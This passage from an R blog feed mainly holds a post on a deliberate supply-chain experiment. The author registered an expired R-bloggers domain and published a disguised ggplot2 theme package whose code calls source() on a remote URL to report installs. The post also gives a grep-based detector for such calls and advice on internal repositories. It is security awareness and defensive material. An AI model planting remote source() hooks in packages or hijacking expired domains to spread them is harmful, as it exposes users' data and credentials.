&lt;p&gt;&lt;a href="http://www.noatamir.com/" rel="external"&gt;Noa&lt;/a&gt; opened the day by telling stories about climate change, mozzarella and wisdom of the crowds. She taught us that “stories are sticky” and using them can be a great way to help colleagues understand and remember statistical principles. She also highlighted the importance of trust, access and knowledge when working with data.&lt;/p&gt;
&lt;h4 id="joe-gallagher-football-analytics-with-the-soccermatics-package"&gt;&lt;a href="https://jogall.github.io/" rel="external"&gt;Joe Gallagher&lt;/a&gt;: Football analytics with the soccermatics package.&lt;/h4&gt;
&lt;p&gt;I don’t really follow football, but &lt;a href="https://jogall.github.io/" rel="external"&gt;Joe&lt;/a&gt;’s talk on his soccermatics package was fascinating. He’s created a tool to visualise and analyse football matches, including pitch heatmaps and individual player trajectories. Joe has a huge list of extra functionality he would like to add and is looking for collaborators. If you would like to help develop the soccermatics package, you can reach out on &lt;a href="https://github.com/JoGall/soccermatics" rel="external"&gt;GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id="thomas-lin-pedersen-creative-coding-for-fun-and-nonprofit"&gt;&lt;a href="https://www.data-imaginist.com/" rel="external"&gt;Thomas Lin Pedersen&lt;/a&gt;: Creative Coding for Fun and (Non)Profit.&lt;/h4&gt;
&lt;p&gt;&lt;a href="https://www.data-imaginist.com/" rel="external"&gt;Thomas&lt;/a&gt; spoke about the benefits of creative coding, and how those little fun extra projects can provide a healthy distraction from a difficult task at hand, whilst also allowing you to learn new skills. He was, however, keen to stress that having time to code for fun is a privilege and not a requirement, so don’t worry if you don’t have time!&lt;/p&gt;
&lt;h3 id="did-you-miss-us"&gt;Did you miss us?&lt;/h3&gt;
&lt;p&gt;Don’t worry if you missed Sat&lt;strong&gt;R&lt;/strong&gt;day Newcastle: all of the talks were recorded and we will be sharing them online shortly. We’re also pleased to announce that Sat&lt;strong&gt;R&lt;/strong&gt;day Newcastle will return on &lt;strong&gt;4th April 2020&lt;/strong&gt;. Save the date!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrday-ncl-review/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>R Packages: Are we too trusting?</title><link>https://www.jumpingrivers.com/blog/r-packages-security-install/</link><pubDate>Mon, 04 Feb 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-packages-security-install/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-packages-security-install/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-packages-security-install/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;One of the great things about R is the myriad of packages. Packages are typically installed via&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;CRAN&lt;/li&gt;
&lt;li&gt;Bioconductor&lt;/li&gt;
&lt;li&gt;GitHub&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;But how often do we think about what we are installing? Do we pay attention or just install when something looks neat? Do we think about security or just take it that everything is secure? In this post, we conducted a little nefarious experiment to see if people pay attention to what they install.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2019-r-packages-security-install"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="r-bloggers-the-hook"&gt;R-bloggers: The hook&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.r-bloggers.com/" rel="external"&gt;R-bloggers&lt;/a&gt; is a great resource for keeping on top of what&amp;rsquo;s happening in the world of R. It&amp;rsquo;s one of the resources we recommend whenever we run &lt;a href="https://jumpingrivers.com/courses" rel="external"&gt;training courses&lt;/a&gt;. For an author to get their site syndicated to R-bloggers, they have to email Tal who will ensure that the site isn&amp;rsquo;t spammy. I recently saw a tweet (I can&amp;rsquo;t remember who from) that suggested, tongue in cheek, that to boost your website ranking, you could just grab a site that used to appear on R-bloggers.&lt;/p&gt;
&lt;p&gt;This gave me an idea for something a bit more devious! Instead of boosting website traffic, could we grab a domain, create a dummy R package, then monitor who installs this package?&lt;/p&gt;
&lt;p&gt;A list of &lt;a href="https://www.r-bloggers.com/blogs-list/" rel="external"&gt;contributing&lt;/a&gt; sites is nicely provided by R-bloggers. A quick and dirty script grabs select target domains. First we load a few packages&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(httr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(tidyverse)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(rvest)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then extract all URLs from the page&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;page_source &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://www.r-bloggers.com/blogs-list/&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_html&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;urls &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;html_attr&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;html_nodes&lt;/span&gt;(page_source, &lt;span style="color:#a5d6ff"&gt;&amp;#34;a&amp;#34;&lt;/span&gt;), &lt;span style="color:#a5d6ff"&gt;&amp;#34;href&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With a little helper function to get the &lt;a href="https://en.wikipedia.org/wiki/List_of_HTTP_status_codes" rel="external"&gt;status code&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# If a site is available, it should return 200&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;get_status_code &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(url) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; status &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;try&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;GET&lt;/span&gt;(url)&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;status, silent &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#d2a8ff;font-weight:bold"&gt;inherits&lt;/span&gt;(status, &lt;span style="color:#a5d6ff"&gt;&amp;#34;try-error&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; status &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; status
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;we simply probe each URL&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Lots of threads&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;status_codes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; parallel&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;mclapply&lt;/span&gt;(urls, get_status_code, mc.cores &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;24&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;status_codes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unlist&lt;/span&gt;(status_codes)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In total, there were 43 URLs not returning the required status code of 200&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tibble&lt;/span&gt;(urls &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; urls, status_codes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; status_codes) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.na&lt;/span&gt;(status_codes)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(status_codes &lt;span style="color:#ff7b72;font-weight:bold"&gt;!=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;200&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;# A tibble: 6 x 2
urls status_codes
&amp;lt;chr&amp;gt; &amp;lt;int&amp;gt;
1 http://www.56n.dk 406
2 http://bio7.org/ 403
3 http://www.seascapemodels.org/bluecology_blog/index.html 404
4 https://climateecology.wordpress.com 410
5 http://www.compmath.com/blog 500
6 https://hamiltonblake.github.io 404
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;In the end, we went with &lt;code&gt;vinux.in&lt;/code&gt;. According to the Wayback Machine, this site seems to have died around 2017. The cost of claiming this site was £10 for the year.&lt;/p&gt;
&lt;p&gt;By claiming this site, I have automatically got a site that has incoming traffic. One evil strategy is simply to sit back and get traffic from R-bloggers.&lt;/p&gt;
&lt;h3 id="blogdown--ggplot2-the-bait"&gt;{blogdown} &amp;amp; {ggplot2}: the bait&lt;/h3&gt;
&lt;p&gt;Next, I created a GitLab user &lt;code&gt;rstatsgit&lt;/code&gt; and a blog via the excellent {blogdown} package. Now clearly we need something to entice people to run our code, so I created a very simple R package that scans {ggplot2} themes. Nothing fancy, only a dozen lines of code or so. In case someone looked at the GitHub page, I just copied a few badges from other packages to make it look more genuine. I used Netlify to link our new blog to our recently purchased domain. The &lt;a href="http://blog.vinux.in" rel="external"&gt;resulting blog&lt;/a&gt; doesn&amp;rsquo;t look too bad at all.&lt;/p&gt;
&lt;p&gt;At the &lt;a href="https://gitlab.com/rstatsgitlab/theme/blob/master/R/themes.R#L105" rel="external"&gt;bottom&lt;/a&gt; of one of the &lt;code&gt;.R&lt;/code&gt; files in the package, there is a simple &lt;code&gt;source()&lt;/code&gt; command. This, in theory, could be used to do anything - grab data, passwords, ssh keys. Clearly, we don&amp;rsquo;t do any of this. Instead, it simply pings a site to tell us if the package has been installed.&lt;/p&gt;
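&lt;p&gt;One way to spot this kind of thing before installing is to search the package source for &lt;code&gt;source()&lt;/code&gt; calls that point at a URL. The following is a minimal sketch using base R only. The helper name &lt;code&gt;find_remote_source()&lt;/code&gt; is hypothetical, it assumes the package has already been downloaded and unpacked to a local directory, and a simple pattern match like this will not catch obfuscated code.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical helper: list lines in a package's R/ directory that
# call source() on an http(s) URL.
find_remote_source = function(pkg_dir) {
  r_files = list.files(file.path(pkg_dir, "R"), pattern = "[.][Rr]$",
                       full.names = TRUE)
  hits = lapply(r_files, function(f) {
    lines = readLines(f, warn = FALSE)
    idx = grep("source[[:space:]]*[(].*https?://", lines)
    if (length(idx) == 0) return(NULL)
    data.frame(file = basename(f), line = idx, code = trimws(lines[idx]),
               stringsAsFactors = FALSE)
  })
  # NULL when nothing suspicious is found
  do.call(rbind, hits)
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Calling &lt;code&gt;find_remote_source()&lt;/code&gt; on the unpacked package directory returns a data frame of matching files and line numbers, or &lt;code&gt;NULL&lt;/code&gt; if there are no matches.&lt;/p&gt;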
&lt;h3 id="r-bloggers--twitter-delivery"&gt;R-bloggers &amp;amp; twitter: Delivery&lt;/h3&gt;
&lt;p&gt;To deliver the content, I&amp;rsquo;m going for a combination of trying to get it onto r-bloggers via the old RSS feed and tweeting about the page with the &lt;code&gt;#rstats&lt;/code&gt; tag.&lt;/p&gt;
&lt;h3 id="did-people-install-the-package"&gt;Did people install the package?&lt;/h3&gt;
&lt;p&gt;I&amp;rsquo;ll update the blog post with results in a week or two.&lt;/p&gt;
&lt;h3 id="who-is-not-to-blame"&gt;Who is &lt;strong&gt;not&lt;/strong&gt; to blame&lt;/h3&gt;
&lt;p&gt;It&amp;rsquo;s instructive to think about who is &lt;strong&gt;not&lt;/strong&gt; to blame:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;GitLab/GitHub: it would be impossible for them to police the code that is uploaded to their sites.&lt;/li&gt;
&lt;li&gt;{devtools} (install_git*()): There are many legitimate uses for these functions. Blaming them would be equivalent to blaming StackOverflow for bad advice. It doesn&amp;rsquo;t really make sense.&lt;/li&gt;
&lt;li&gt;R-bloggers: It simply isn&amp;rsquo;t feasible to thoroughly vet every post. In the past, the site has quickly reacted to anything spammy and removed offending articles. They also have no control&lt;/li&gt;
&lt;li&gt;The person who owned the site: Nope. They owned the site. Now they don&amp;rsquo;t. They have no responsibility.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="who-is-to-blame"&gt;Who is to blame?&lt;/h3&gt;
&lt;p&gt;Well, I suppose I&amp;rsquo;m to blame since I created the site and package ;) But more seriously, if you installed the package, &lt;strong&gt;you&amp;rsquo;re&lt;/strong&gt; to blame! I think everyone is guilty of copying and pasting code from blogs, StackOverflow and forums without always understanding what&amp;rsquo;s going on. But the internet is a dangerous place, and most people who use R almost certainly have juicy data that shouldn&amp;rsquo;t be released to the outside world.&lt;/p&gt;
&lt;p&gt;By pure coincidence, I&amp;rsquo;ve noticed that &lt;a href="https://twitter.com/hrbrmstr" rel="external"&gt;Bob Rudis&lt;/a&gt; has started emphasising that we should be more responsible about what we install.&lt;/p&gt;
&lt;h3 id="how-to-protect-against-this"&gt;How to protect against this?&lt;/h3&gt;
&lt;p&gt;This is something we have been helping clients tackle over the last two years. On one hand, companies use R to run the latest algorithms and try cutting edge visualisation methods. On top of this, they employ bright and enthusiastic data scientists who enjoy what they do. If companies make things too restrictive, people will either find a way around the problem or simply leave.&lt;/p&gt;
&lt;p&gt;The crucial thing to remember is that if someone really wants to do something unsafe, we can&amp;rsquo;t stop them. Instead, we need to provide safe alternatives that don&amp;rsquo;t hinder work while at the same time reduce overall risk.&lt;/p&gt;
&lt;p&gt;When dealing with companies, we help them tackle the problem in a number of ways:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Education! Both of the team and team leaders!&lt;/li&gt;
&lt;li&gt;Have an internal package repository. Either we build this, or use RStudio&amp;rsquo;s package manager (&lt;a href="https://www.jumpingrivers.com/posit/" rel="external"&gt;we&amp;rsquo;re one of the few RStudio Certified partners&lt;/a&gt; in the world).&lt;/li&gt;
&lt;li&gt;We may disable tools such as &lt;code&gt;install_github()&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Reduce risk by having clear testing and deployment machines&lt;/li&gt;
&lt;li&gt;Implement two-factor authentication&lt;/li&gt;
&lt;/ul&gt;
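&lt;p&gt;As a rough illustration of the internal repository idea, R can be pointed at a single approved repository through the &lt;code&gt;repos&lt;/code&gt; option, for example in a site-wide &lt;code&gt;Rprofile.site&lt;/code&gt;. This is only a sketch: the URL below is a placeholder rather than a real server, and setting the option does not by itself stop someone installing from elsewhere.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;# Placeholder URL (an assumption for illustration); replace it with
# the address of your own internal repository.
internal_repo = "https://packages.example.com/cran"

# Make the internal repository the only default source of packages
options(repos = c(INTERNAL = internal_repo))

# Check which repositories install.packages() will now use
getOption("repos")
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With this in place, &lt;code&gt;install.packages()&lt;/code&gt; looks in the internal repository by default, so the safe route is also the easy one.&lt;/p&gt;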
&lt;p&gt;All of the above can be circumvented by a data scientist. But the idea is that, with education, we can reduce the potential risk while not impeding day-to-day work.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-packages-security-install/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>{benchmarkme}: new version</title><link>https://www.jumpingrivers.com/blog/benchmarkme-new-version/</link><pubDate>Tue, 29 Jan 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/benchmarkme-new-version/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/benchmarkme-new-version/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/benchmarkme-new-version/original.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;When discussing how to speed up slow R code, my first question is: what is your computer spec? It&amp;rsquo;s always surprised me that people wonder why analysing big data is slow, yet they are using a five-year-old cheap laptop. Spending a few thousand pounds would often make their problems disappear. To quantify the impact of the CPU on analysis, I created the package {benchmarkme}. The aim of this package is to provide a set of benchmark routines and data from past runs. You can then compare your machine with other CPUs.&lt;/p&gt;
&lt;p&gt;The package is now on CRAN and can be installed in the usual way&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 3.5.X only&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;benchmarkme&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The package contains two main benchmarks:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;benchmark_std()&lt;/code&gt;: this benchmarks numerical operations such as loops and matrix operations. The benchmark comprises three separate benchmarks: &lt;code&gt;prog&lt;/code&gt;, &lt;code&gt;matrix_fun&lt;/code&gt;, and &lt;code&gt;matrix_cal&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;benchmark_io()&lt;/code&gt;: this benchmarks reading and writing a 5 MB or 50 MB CSV file.&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2019-benchmarkme-new-version"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="the-benchmark_std-function"&gt;The benchmark_std() function&lt;/h3&gt;
&lt;p&gt;This benchmarks numerical operations such as loops and matrix operations. This benchmark comprises three separate benchmarks: &lt;code&gt;prog&lt;/code&gt;, &lt;code&gt;matrix_fun&lt;/code&gt;, and &lt;code&gt;matrix_cal&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;If you have less than 3GB of RAM (run &lt;code&gt;get_ram()&lt;/code&gt; to find out how much is available on your system), then you should kill any memory hungry applications, e.g. Firefox, and set &lt;code&gt;runs = 1&lt;/code&gt; as an argument.&lt;/p&gt;
&lt;p&gt;To benchmark your system, use&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;benchmarkme&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Increase runs if you have a higher spec machine&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;res &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;benchmark_std&lt;/span&gt;(runs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and upload your results&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## You can control exactly what is uploaded. See details below.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;upload_results&lt;/span&gt;(res)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can compare your results to other users via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;(res)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="featured.jpg" style="width:450px; class:image-center" alt="Benchmarkme results"&gt;
&lt;h3 id="the-benchmark_io-function"&gt;The benchmark_io() function&lt;/h3&gt;
&lt;p&gt;This function benchmarks reading and writing a 5MB or 50MB CSV file (if you have less than 4GB of RAM, reduce the number of &lt;code&gt;runs&lt;/code&gt; to 1). Run the benchmark using&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;res_io &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;benchmark_io&lt;/span&gt;(runs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;upload_results&lt;/span&gt;(res_io)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;(res_io)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;By default, the files are written to a temporary directory generated by&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tempdir&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which depends on the value of&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.getenv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;TMPDIR&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can alter this via the &lt;code&gt;tmpdir&lt;/code&gt; argument. This is useful for comparing hard drive access to a network drive.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;res_io &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;benchmark_io&lt;/span&gt;(tmpdir &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;some_other_directory&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;As before, you can compare your results to previous results via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;(res_io)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="parallel-benchmarks"&gt;Parallel benchmarks&lt;/h3&gt;
&lt;p&gt;The benchmark functions above have a parallel option: simply specify the number of cores you want to test. For example, to test using four cores&lt;/p&gt;
